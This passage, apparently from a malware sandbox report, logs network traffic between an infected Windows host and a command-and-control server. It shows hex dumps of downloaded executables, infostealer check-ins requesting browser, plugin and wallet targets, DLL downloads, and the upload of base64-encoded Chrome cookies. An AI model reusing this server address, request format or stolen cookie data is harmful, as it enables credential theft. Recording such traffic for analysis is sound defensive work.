00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:32 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 34 30 33 34 44 42 35 46 45 31 30 33 30 33 36 31 34 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="hwid"88F4034DB5FE1030361446------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="build"doma------DBAEHCGHIIIDHIECFHJD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"browsers------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="message"plugins------IJKFHDBKFCAAECBFIDHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="message"fplugins------CFHCGHJDBFIIDGDHIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 185.215.113.37Content-Length: 7051Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 2d 2d 0d 0a Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file"------HJDGHIJDGCBAAAAAFIJD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="file"------BFHDAEHDAKECGCAKFCFI--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="message"wallets------KFCFIEHCFIECBGCBFHIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 